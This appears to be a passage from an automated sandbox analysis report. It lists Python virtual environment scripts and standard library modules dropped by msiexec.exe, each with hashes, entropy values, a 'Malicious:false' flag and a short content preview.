                                                                                                                                Preview:# This file must be used with "source bin/activate.csh" *from csh*...# You cannot run it directly...# Created by Davide Di Blasi <davidedb@gmail.com>...# Ported to Python 3.3 venv by Andrew Svetlov <andrew.svetlov@gmail.com>....alias deactivate 'test $?_OLD_VIRTUAL_PATH != 0 && setenv PATH "$_OLD_VIRTUAL_PATH" && unset _OLD_VIRTUAL_PATH; rehash; test $?_OLD_VIRTUAL_PROMPT != 0 && set prompt="$_OLD_VIRTUAL_PROMPT" && unset _OLD_VIRTUAL_PROMPT; unsetenv VIRTUAL_ENV; unsetenv VIRTUAL_ENV_PROMPT; test "\!:*" != "nondestructive" && unalias deactivate'....# Unset irrelevant variables...deactivate nondestructive....setenv VIRTUAL_ENV "__VENV_DIR__"....set _OLD_VIRTUAL_PATH="$PATH"..setenv PATH "$VIRTUAL_ENV/__VENV_BIN_NAME__:$PATH"......set _OLD_VIRTUAL_PROMPT="$prompt"....if (! "$?VIRTUAL_ENV_DISABLE_PROMPT") then.. set prompt = "__VENV_PROMPT__$prompt".. setenv VIRTUAL_ENV_PROMPT "__VENV_PROMPT__"..endif....alias pydoc python -m pydoc....rehash..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2143
                                                                                                                                Entropy (8bit):4.987672929613798
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:vRM6PP/1wecFzy4Y5ImBBrMYHI2OxNCgxImd7:vNn1wecFzy4Y5IqrMYHI2eCHk7
                                                                                                                                MD5:ACF61E665D653A72DC58E2A1B793AD08
                                                                                                                                SHA1:2013CAF048C84C6231D0FCD75287B134096FBD33
                                                                                                                                SHA-256:9E6CD4E7A3FC88E38A2184817004A648071A0AC3905885199B61038DAFD69DE5
                                                                                                                                SHA-512:769D31029F62B45526D85E254E9871BE02F3C8C8D96C490DF1002CBF893B37F5D562D7CA8E875A406D89E3CEDCBD2322FE0DA316BEDF18B10B331AF0AF032B03
                                                                                                                                Malicious:false
                                                                                                                                Preview:# This file must be used with "source <venv>/bin/activate.fish" *from fish*..# (https://fishshell.com/); you cannot run it directly.....function deactivate -d "Exit virtual environment and return to normal shell environment".. # reset old environment variables.. if test -n "$_OLD_VIRTUAL_PATH".. set -gx PATH $_OLD_VIRTUAL_PATH.. set -e _OLD_VIRTUAL_PATH.. end.. if test -n "$_OLD_VIRTUAL_PYTHONHOME".. set -gx PYTHONHOME $_OLD_VIRTUAL_PYTHONHOME.. set -e _OLD_VIRTUAL_PYTHONHOME.. end.... if test -n "$_OLD_FISH_PROMPT_OVERRIDE".. functions -e fish_prompt.. set -e _OLD_FISH_PROMPT_OVERRIDE.. functions -c _old_fish_prompt fish_prompt.. functions -e _old_fish_prompt.. end.... set -e VIRTUAL_ENV.. set -e VIRTUAL_ENV_PROMPT.. if test "$argv[1]" != "nondestructive".. # Self-destruct!.. functions -e deactivate.. end..end....# Unset irrelevant variables...deactivate nondestructive....set -gx VI
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):21605
                                                                                                                                Entropy (8bit):4.4803992619659585
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:VIGjFGnRqmpRXDeU+e6TNkedNr/voix0BWSvs31I:VI4GnRqm2xQiOBDs31I
                                                                                                                                MD5:13114C0B8478D3B2AEE7FA6E56971E9F
                                                                                                                                SHA1:8F8F5AA7DFC2D6C1804DA0E22E5820B99A26C219
                                                                                                                                SHA-256:DD8D3B7CEAD8AA956C330BE2AC6F615409C2F42CEE7C3EC5968989B624048F38
                                                                                                                                SHA-512:46995FC8FCC4C32FF70A0E588A698E742805A7F7E3261E635B9E12956A5EC4BFB95C537B16524094ECC516A1F9235FC797E6078661827AD3A7F76562FC340E6B
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Python part of the warnings subsystem."""....import sys......__all__ = ["warn", "warn_explicit", "showwarning",.. "formatwarning", "filterwarnings", "simplefilter",.. "resetwarnings", "catch_warnings"]....def showwarning(message, category, filename, lineno, file=None, line=None):.. """Hook to write a warning to a file; replace if you like.""".. msg = WarningMessage(message, category, filename, lineno, file, line).. _showwarnmsg_impl(msg)....def formatwarning(message, category, filename, lineno, line=None):.. """Function to format a warning the standard way.""".. msg = WarningMessage(message, category, filename, lineno, None, line).. return _formatwarnmsg_impl(msg)....def _showwarnmsg_impl(msg):.. file = msg.file.. if file is None:.. file = sys.stderr.. if file is None:.. # sys.stderr is None when run with pythonw.exe:.. # warnings get lost.. return.. text = _formatwarnmsg(msg).. try:..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):22472
                                                                                                                                Entropy (8bit):4.354656288455836
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:lHM8ycySCHhe0Iul1eILSe7aYhTRhbtsM0h96f1:1MnPHhe0Iul1737fFhba74d
                                                                                                                                MD5:457F7946475DCDCE61EA8C299898942E
                                                                                                                                SHA1:6B61F8850FFF6897DB20A97B971FC98580098EDD
                                                                                                                                SHA-256:B47CB683B62E9FF9656FFC1A9B1662DEADF8BE15D18D065879E503C0A1D6C60D
                                                                                                                                SHA-512:A07B763DB232901B3AA686E171858B404D6D74A39D2512558F3D01991A09C49A307B31C2974D5354F0DB43B165380369F088C8CC91081FE674EA4BC01D768D84
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Stuff to parse WAVE files.....Usage.....Reading WAVE files:.. f = wave.open(file, 'r')..where file is either the name of a file or an open file pointer...The open file pointer must have methods read(), seek(), and close()...When the setpos() and rewind() methods are not used, the seek()..method is not necessary.....This returns an instance of a class with the following public methods:.. getnchannels() -- returns number of audio channels (1 for.. mono, 2 for stereo).. getsampwidth() -- returns sample width in bytes.. getframerate() -- returns sampling frequency.. getnframes() -- returns number of audio frames.. getcomptype() -- returns compression type ('NONE' for linear samples).. getcompname() -- returns human-readable version of.. compression type ('not compressed' linear samples).. getparams() -- returns a namedtuple consisting of all of the.. above in th
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):22187
                                                                                                                                Entropy (8bit):4.286714165954684
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:gJp8HzCblJPEwGmyZVPjY8c4jDyCYAym+TiH9QHORqQeIXjWi86wow0wHRegJn9d:g3EPOpRUBzSmOjJnCoWaDf3DjJnRKs
                                                                                                                                MD5:0C6F82FB8421E6992AEAAB71A587C9DE
                                                                                                                                SHA1:243DFA4F9E4BCCB75996369F74D0925E4FA0DAE7
                                                                                                                                SHA-256:6721C34BA3C404BF4A443890ED374B546A870C958935A6AA4FDF634876A5A980
                                                                                                                                SHA-512:73C764399C329600849F91BA4872BC2BB93B99133BD76DCF3B4440F8FF66FD17919420560B020FFA64BAEAD8A3905E3B4CDB65DE3A50846951EDC3B0E32A466E
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Weak reference support for Python.....This module is an implementation of PEP 205:....https://peps.python.org/pep-0205/.."""....# Naming convention: Variables named "wr" are weak reference objects;..# they are called this instead of "ref" to avoid name collisions with..# the module-global ref() function imported from _weakref.....from _weakref import (.. getweakrefcount,.. getweakrefs,.. ref,.. proxy,.. CallableProxyType,.. ProxyType,.. ReferenceType,.. _remove_dead_weakref)....from _weakrefset import WeakSet, _IterationGuard....import _collections_abc # Import after _weakref to avoid circular import...import sys..import itertools....ProxyTypes = (ProxyType, CallableProxyType)....__all__ = ["ref", "proxy", "getweakrefcount", "getweakrefs",.. "WeakKeyDictionary", "ReferenceType", "ProxyType",.. "CallableProxyType", "ProxyTypes", "WeakValueDictionary",.. "WeakSet", "WeakMethod", "finalize"]......_collections_abc.MutableSet
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25825
                                                                                                                                Entropy (8bit):4.483873324420568
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:DwxgtAvw1CThtWcOGsmCZXW11GhVqbzkeZEcF:DwMyhccVCZXbDg
                                                                                                                                MD5:E76CCEE4AB9BA60086426145CCD91E7E
                                                                                                                                SHA1:6206BB536ADB336E51484280985403F116EDD98B
                                                                                                                                SHA-256:4E5A0C03F6D7B97B014808D0AADA815355BBB4159A835DEC6A5CA49EAB3C1F71
                                                                                                                                SHA-512:FC6C39CF30F4EC40F64E0922943643524C7D76F98ADCCB048322743811A08A08A101754AE5878C8C17A5025522DC6502AC889ABA68B6993611E47F9400C0F6D3
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3.."""Interfaces for launching and remotely controlling web browsers."""..# Maintained by Georg Brandl.....import os..import shlex..import shutil..import sys..import subprocess..import threading..import warnings....__all__ = ["Error", "open", "open_new", "open_new_tab", "get", "register"]....class Error(Exception):.. pass...._lock = threading.RLock().._browsers = {} # Dictionary of available browser controllers.._tryorder = None # Preference order of available browsers.._os_preferred_browser = None # The preferred browser....def register(name, klass, instance=None, *, preferred=False):.. """Register a browser connector.""".. with _lock:.. if _tryorder is None:.. register_standard_browsers().. _browsers[name.lower()] = [klass, instance].... # Preferred browsers go to the front of the list... # Need to match to the default browser returned by xdg-settings, which.. # may be of t
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):682
                                                                                                                                Entropy (8bit):4.74586378239771
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:aMSZzRV70C6qkXJqMbZuIeO0Z6VquA31zVuALrc4perTcI3oZ31bC8fNNNG8:Mzn6tUGZuRx6VdOdrY4oIx1DfvNG8
                                                                                                                                MD5:752762A137474F10062D2B4DD6EB0666
                                                                                                                                SHA1:C6912436B710F3ACF4C06FAF81C52D167A4AE229
                                                                                                                                SHA-256:978228AE9DB30BD59E31AB960BFCA45D15411267F0C5BFC449BFEA84284DA118
                                                                                                                                SHA-512:99BBB4720B0A682B768D33A7F63487E291E2896397A8FA70B99BA0D8EDE1879E0A9E8DE49BA46BED73114A8F6A9D8161D3053CC48088F08AA753F9B3E215B8FB
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""wsgiref -- a WSGI (PEP 3333) Reference Library....Current Contents:....* util -- Miscellaneous useful functions and wrappers....* headers -- Manage response headers....* handlers -- base classes for server/gateway implementations....* simple_server -- a simple BaseHTTPServer that supports WSGI....* validate -- validation wrapper that sits between an app and a server.. to detect errors in either....* types -- collection of WSGI-related types for static type checking....To-Do:....* cgi_gateway -- Run WSGI apps under CGI (pending a deployment standard)....* cgi_wrapper -- Run CGI apps under WSGI....* router -- a simple middleware component that handles URL traversal.."""..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):22120
                                                                                                                                Entropy (8bit):4.586337000610625
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:JwIEd11/napFUzQ6UZgiFJh1IO5JS2YPUiVbKzEbqm:JwldrnC2QLZgGJD3SXfpKQR
                                                                                                                                MD5:E4E217C2257A0A3D5A734C3424DB3047
                                                                                                                                SHA1:C00AF32FE4C7D469B487E0D62A783E1A1B332F8F
                                                                                                                                SHA-256:09D973EFB806ED4BA89E5B63BFD7C755EB7F40901035E4F8441B83B911D492C0
                                                                                                                                SHA-512:3802642C129107B386F027DB0BCD36DB008E2AAE8EB7AC07EDCA07769DE6085D515D1CF629E35F3EF3D8B5CC0C0534D481FC27EF194468B62885A2A6537703AE
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Base classes for server/gateway implementations"""....from .util import FileWrapper, guess_scheme, is_hop_by_hop..from .headers import Headers....import sys, os, time....__all__ = [.. 'BaseHandler', 'SimpleHandler', 'BaseCGIHandler', 'CGIHandler',.. 'IISCGIHandler', 'read_environ'..]....# Weekday and month names for HTTP date/time formatting; always English!.._weekdayname = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"].._monthname = [None, # Dummy so we can use 1-based month numbers.. "Jan", "Feb", "Mar", "Apr", "May", "Jun",.. "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]....def format_date_time(timestamp):.. year, month, day, hh, mm, ss, wd, y, z = time.gmtime(timestamp).. return "%s, %02d %3s %4d %02d:%02d:%02d GMT" % (.. _weekdayname[wd], day, _monthname[month], year, hh, mm, ss.. )...._is_request = {.. 'SCRIPT_NAME', 'PATH_INFO', 'QUERY_STRING', 'REQUEST_METHOD', 'AUTH_TYPE',.. 'CONTENT_TYPE', 'CONTENT_LENGTH', 'HTTPS', 'REM
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6950
                                                                                                                                Entropy (8bit):4.452309215621417
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:p3Xzp1CtDqI4p4JWKQOj39xUHmjV7u9vJ1XAkm85ny:pnG4j4ZjNxFJ7KAYny
                                                                                                                                MD5:DE43247A8F9221995F9BDA75FDB451E2
                                                                                                                                SHA1:180AC426596F99CD67669F0DC45926F87E943A4A
                                                                                                                                SHA-256:7B96D1DD47E97B5AAB695FE4062D53744E0B7C058BB1565C6E65CAF4DAC9EBCB
                                                                                                                                SHA-512:ABB7372F921120C98A802259FD1EFE067029434A5577416C7E3CAF6AC3BD5FE914C49F807BBF15DF31AE75D01CF0E0D6D30FC9E9E18EA2ACADEBD249C22FB8CC
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Manage HTTP Response Headers....Much of this module is red-handedly pilfered from email.message in the stdlib,..so portions are Copyright (C) 2001,2002 Python Software Foundation, and were..written by Barry Warsaw..."""....# Regular expression that matches `special' characters in parameters, the..# existence of which force quoting of the parameter value...import re..tspecials = re.compile(r'[ \(\)<>@,;:\\"/\[\]\?=]')....def _formatparam(param, value=None, quote=1):.. """Convenience function to format and return a key=value pair..... This will quote the value if needed or if quote is true... """.. if value is not None and len(value) > 0:.. if quote or tspecials.search(value):.. value = value.replace('\\', '\\\\').replace('"', r'\"').. return '%s="%s"' % (param, value).. else:.. return '%s=%s' % (param, value).. else:.. return param......class Headers:.. """Manage a collection of HTTP response headers""".... de
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5336
                                                                                                                                Entropy (8bit):4.856557033789357
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:aYWTBCDGpP5GMbUYYQoa3PM9190e5+ULK4kM1jS3k5/wVR:aNMSbUHa/2Ge5+OkM18YwVR
                                                                                                                                MD5:B7D46278821659B18DBAE151058B1AE9
                                                                                                                                SHA1:00E2FB326D13D8BD33E50CB3FFBAF4AD4EB20444
                                                                                                                                SHA-256:E2A6C322349214CA18159541EA763EADEA4DA2A1998C002B8CA5DC3396D0E0D2
                                                                                                                                SHA-512:DB0806C0C98A0C4B17BDE92FFBB230AB430668A3C11AE74A2FB423C5A145A9C7E69B5CD0BED7176C9959FE0B8EFF7E00A83C8F4D8291BED8B785D360A95C094D
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""BaseHTTPServer that implements the Python WSGI protocol (PEP 3333)....This is both an example of how WSGI can be implemented, and a basis for running..simple web applications on a local machine, such as might be done when testing..or debugging an application. It has not been reviewed for security issues,..however, and we strongly recommend that you use a "real" web server for..production use.....For example usage, see the 'if __name__=="__main__"' block at the end of the..module. See also the BaseHTTPServer module docs for other API information..."""....from http.server import BaseHTTPRequestHandler, HTTPServer..import sys..import urllib.parse..from wsgiref.handlers import SimpleHandler..from platform import python_implementation....__version__ = "0.2"..__all__ = ['WSGIServer', 'WSGIRequestHandler', 'demo_app', 'make_server']......server_version = "WSGIServer/" + __version__..sys_version = python_implementation() + "/" + sys.version.split()[0]..software_version = server_version +
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1771
                                                                                                                                Entropy (8bit):4.938759888371545
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:HIuo5NjC6LJYN5p2J1eg3lA1RzJabfgbffb2TiZj++aboaApi8P8:HIu63aNv2J1eqPM7Ck0MbiF
                                                                                                                                MD5:4AFAB88D4A1CD84F053AA85B1F04D326
                                                                                                                                SHA1:702C2A494F78A27E6618FB358D0199F9185C8E43
                                                                                                                                SHA-256:F56851D14F5008804BB8220A23B5963D55BA08139F9EA4F22BA2773ADE85A34B
                                                                                                                                SHA-512:053406531CA7FB8B4F4CD9809E5BD4066CD9D68E604DB436024A942517C95C97F8BD2C90CDA7E0AD038C6ED6462E90339093894259528187FF0029211691CEFD
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""WSGI-related types for static type checking"""....from collections.abc import Callable, Iterable, Iterator..from types import TracebackType..from typing import Any, Protocol, TypeAlias....__all__ = [.. "StartResponse",.. "WSGIEnvironment",.. "WSGIApplication",.. "InputStream",.. "ErrorStream",.. "FileWrapper",..]...._ExcInfo: TypeAlias = tuple[type[BaseException], BaseException, TracebackType].._OptExcInfo: TypeAlias = _ExcInfo | tuple[None, None, None]....class StartResponse(Protocol):.. """start_response() callable as defined in PEP 3333""".. def __call__(.. self,.. status: str,.. headers: list[tuple[str, str]],.. exc_info: _OptExcInfo | None = ...,.. /,.. ) -> Callable[[bytes], object]: .......WSGIEnvironment: TypeAlias = dict[str, Any]..WSGIApplication: TypeAlias = Callable[[WSGIEnvironment, StartResponse],.. Iterable[bytes]]....class InputStream(Protocol):.. """WSGI input stream as defined in PEP 3333""".. d
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5631
                                                                                                                                Entropy (8bit):5.017728083580684
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:XW34CNDEbyh7ryLMdzNCzlGS5NipQY/LKQYItQDmATxGH1pqZQRt:XNx2h5wlGgNipQY/eQYyQaEm1poQRt
                                                                                                                                MD5:11AB47A8BA3D4FF441DC5F9EE4493330
                                                                                                                                SHA1:8798B3210B6FEFD58877474850D22C1171DB90BA
                                                                                                                                SHA-256:B0A1004776DFFFFD3073E39100CE6FCFDD03D7A3EEF7A856C9A946E031477154
                                                                                                                                SHA-512:9DCAF617A311703849F22F870E5EB25CDF09277C517C078ABDF18C9EA6F2165249F0D76C8DAA86517E192D643E95DEC35DEF2AB466E5A1C0C0A610DC27F4B750
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Miscellaneous WSGI-related Utilities"""....import posixpath....__all__ = [.. 'FileWrapper', 'guess_scheme', 'application_uri', 'request_uri',.. 'shift_path_info', 'setup_testing_defaults',..]......class FileWrapper:.. """Wrapper to convert file-like objects to iterables""".... def __init__(self, filelike, blksize=8192):.. self.filelike = filelike.. self.blksize = blksize.. if hasattr(filelike,'close'):.. self.close = filelike.close.... def __iter__(self):.. return self.... def __next__(self):.. data = self.filelike.read(self.blksize).. if data:.. return data.. raise StopIteration....def guess_scheme(environ):.. """Return a guess for whether 'wsgi.url_scheme' should be 'http' or 'https'.. """.. if environ.get("HTTPS") in ('yes','on','1'):.. return 'https'.. else:.. return 'http'....def application_uri(environ):.. """Return the application's base URI (no PATH_INFO or Q
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):15540
                                                                                                                                Entropy (8bit):4.752019942745504
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZaBfuth+3sZiMWsXo8vtFVccc6oMS/PWZhNq/v3wza/uPFJuG6ZthKpCcGWK7q5c:Z8cM3m+sf5KHCH5CcGXnQu
                                                                                                                                MD5:4F0D1FDAA3EAA2CEBF2F08893D332D98
                                                                                                                                SHA1:D7CEEF63F012D027B4012F3ADC7022A560CAADC4
                                                                                                                                SHA-256:3A9846968D1944DE876B4FA7F400B18CE5CD3822DA834EDC5326D1BEF1C0B555
                                                                                                                                SHA-512:12785457C1FA37EA5B331D51F54DE737E5D07DADDC82E83CDE73C6AB17D31AC3DFAC283ADA5C1BF04D25A97A779F1D6B5E6DC0EC559FD09DE60DE7563EA68D09
                                                                                                                                Malicious:false
                                                                                                                                Preview:# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)..# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php..# Also licenced under the Apache License, 2.0: http://opensource.org/licenses/apache2.0.php..# Licensed to PSF under a Contributor Agreement.."""..Middleware to check for obedience to the WSGI specification.....Some of the things this checks:....* Signature of the application and start_response (including that.. keyword arguments are not used).....* Environment checks:.... - Environment is a dictionary (and not a subclass)..... - That all the required keys are in the environment: REQUEST_METHOD,.. SERVER_NAME, SERVER_PORT, wsgi.version, wsgi.input, wsgi.errors,.. wsgi.multithread, wsgi.multiprocess, wsgi.run_once.... - That HTTP_CONTENT_TYPE and HTTP_CONTENT_LENGTH are not in the.. environment (these headers should appear as CONTENT_LENGTH and.. CONTENT_TYPE)..... - Warns if QUERY_STRING is missing, a
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6221
                                                                                                                                Entropy (8bit):4.554243588572104
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:l3vVOCEFsFUxepdMJhp1ygk+3PGo7YytCl:l37jSg0w6GMYywl
                                                                                                                                MD5:272394791C09C580F91C6FE3B926AE4B
                                                                                                                                SHA1:25BAF7BE441DF69F1BF8E3327BAF35DFA99BFFAF
                                                                                                                                SHA-256:434FAFCD1AEFA75483EE483464FA5FB91CFD196953AC19E0DF835DC3E8D75FE7
                                                                                                                                SHA-512:3035F245196D39FA0A862F575AB13404E5386ECAAE09B554F3E5643229E4914C53661E47A3AEC43B5F016D4239F227DC9771D1AC0682A19C3095A8D36442C548
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Implements (a subset of) Sun XDR -- eXternal Data Representation.....See: RFC 1014...."""....import struct..from io import BytesIO..from functools import wraps..import warnings....warnings._deprecated(__name__, remove=(3, 13))....__all__ = ["Error", "Packer", "Unpacker", "ConversionError"]....# exceptions..class Error(Exception):.. """Exception class for this module. Use:.... except xdrlib.Error as var:.. # var has the Error instance for the exception.... Public ivars:.. msg -- contains the message.... """.. def __init__(self, msg):.. self.msg = msg.. def __repr__(self):.. return repr(self.msg).. def __str__(self):.. return str(self.msg)......class ConversionError(Error):.. pass....def raise_conversion_error(function):.. """ Wrap any raised struct.errors in a ConversionError. """.... @wraps(function).. def result(self, value):.. try:.. return function(self, value).. except struct.error as e:
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):577
                                                                                                                                Entropy (8bit):4.836838565624073
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:IeV0+4tWAyKAiKfYtMMZFVSzkGQHxud8oRQZRlIjtRniMDJn+8/Av:90jUpKPK67qkGQHC8MQZRwtR9Vov
                                                                                                                                MD5:BBF47A853581DA94F257137FC2931942
                                                                                                                                SHA1:7F92F135DEEEC0C2305D13EDABE46326FFDBF74C
                                                                                                                                SHA-256:8E7BC2B8A9974751E0BF0BE8E8FD3C116FB0ED2FF2E372F693A7E3659A46F8DC
                                                                                                                                SHA-512:7DB6463C19416A01B51B87F84AF5AB44182339938F9F1B919E49D44C4DA62EA3CF46967A8A23F8716DC43A3F779F01FDC3C2E83A09D127EDA04CE6E2FF07ACDA
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Core XML support for Python.....This package contains four sub-packages:....dom -- The W3C Document Object Model. This supports DOM Level 1 +.. Namespaces.....parsers -- Python wrappers for XML parsers (currently only supports Expat).....sax -- The Simple API for XML, developed by XML-Dev, led by David.. Megginson and ported to Python by Lars Marius Garshol. This.. supports the SAX 2 API.....etree -- The ElementTree XML library. This is a subset of the full.. ElementTree XML release....."""......__all__ = ["dom", "parsers", "sax", "etree"]..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):963
                                                                                                                                Entropy (8bit):4.460105538633994
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:qiOFX0CABphpk4p/RSaXptaKEUtkNUG5fUy5PsFPQ:dOqphpk4p4aX/aKEUSUG5fUs1
                                                                                                                                MD5:9958E8A8D21FFE4E3F7BDC7779266848
                                                                                                                                SHA1:2649B95DE7342E1EA1FEDAF5A4177AEAC1B1B670
                                                                                                                                SHA-256:125B3733259B454A33B339E5B20AB0B814DC4FBA6337DB0BF92C3E8B35F38DC6
                                                                                                                                SHA-512:70DBBCB137D11E90075DACC54B49652990BF374749123F7C9ABFF3F474922CF2AD87F982F676ECD155BA5F59EF32CBE73D6C52FEC240D5F6C23A4C5FFA3D76B2
                                                                                                                                Malicious:false
                                                                                                                                Preview:# This is the Python mapping for interface NodeFilter from..# DOM2-Traversal-Range. It contains only constants.....class NodeFilter:.. """.. This is the DOM2 NodeFilter interface. It contains only constants... """.. FILTER_ACCEPT = 1.. FILTER_REJECT = 2.. FILTER_SKIP = 3.... SHOW_ALL = 0xFFFFFFFF.. SHOW_ELEMENT = 0x00000001.. SHOW_ATTRIBUTE = 0x00000002.. SHOW_TEXT = 0x00000004.. SHOW_CDATA_SECTION = 0x00000008.. SHOW_ENTITY_REFERENCE = 0x00000010.. SHOW_ENTITY = 0x00000020.. SHOW_PROCESSING_INSTRUCTION = 0x00000040.. SHOW_COMMENT = 0x00000080.. SHOW_DOCUMENT = 0x00000100.. SHOW_DOCUMENT_TYPE = 0x00000200.. SHOW_DOCUMENT_FRAGMENT = 0x00000400.. SHOW_NOTATION = 0x00000800.... def acceptNode(self, node):.. raise NotImplementedError..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4159
                                                                                                                                Entropy (8bit):5.031706800364569
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:NRSUBXmSRzMdQOW35aBEqRsKBkMUXz7DZW5Lorzi7xA/knQQ/mDvTNm:bXbMdcUEcBkMaz7DZWLorzi72/kCm
                                                                                                                                MD5:52A7C6D8927595A89F26EECC28A9F27C
                                                                                                                                SHA1:056019A0C1D1B5F32CA7333D796176648593262D
                                                                                                                                SHA-256:205D03F2E27639A136047A7DC21C37FD3AC7CE593899F8BFC482B33274C090AB
                                                                                                                                SHA-512:A2799115A9B5D0D78B9F18A3A066B6DB17741354B2B65443CE4242092AE43D71B047E035BD3B22EE9FA011D505A9B89333C6D48CEF0D43E8D1A6AD6C3B57B506
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""W3C Document Object Model implementation for Python.....The Python mapping of the Document Object Model is documented in the..Python Library Reference in the section on the xml.dom package.....This package contains the following modules:....minidom -- A simple implementation of the Level 1 DOM with namespace.. support added (based on the Level 2 specification) and other.. minor Level 2 functionality.....pulldom -- DOM builder supporting on-demand tree-building for selected.. subtrees of the document....."""......class Node:.. """Class giving the NodeType constants.""".. __slots__ = ().... # DOM implementations may use this as a base class for their own.. # Node implementations. If they don't, the constants defined here.. # should still be used as the canonical definitions as they match.. # the values given in the W3C recommendation. Client code can.. # safely refer to these values in all tests of Node.nodeType.. # values.....
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3550
                                                                                                                                Entropy (8bit):4.649534812433712
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:klJp4I0LAIesg2M2X/81X/zwAidRXqUrFNZfeuRGTfrfQP:kvp4R8Ie/2M2P2X/0pOUzZ2u6jIP
                                                                                                                                MD5:1428A8AD8E0FF4731EC5F42BDE8A7ADD
                                                                                                                                SHA1:D90646B5B206E70D933B825CB714360C8BB0694F
                                                                                                                                SHA-256:174FACA21D253FB4AC50624823614B5B3B41E7B8BDF64D59EF75E901AD43B0A9
                                                                                                                                SHA-512:8E329FBEFCB9537C3A59B7001C912BE1972C2190DECDBFC963C8F082B55697DEA8B9E6268EB76F7EF451E705C6EFF03B0230611AA9CDC4586C3589FDD5485ADE
                                                                                                                                Malicious:false
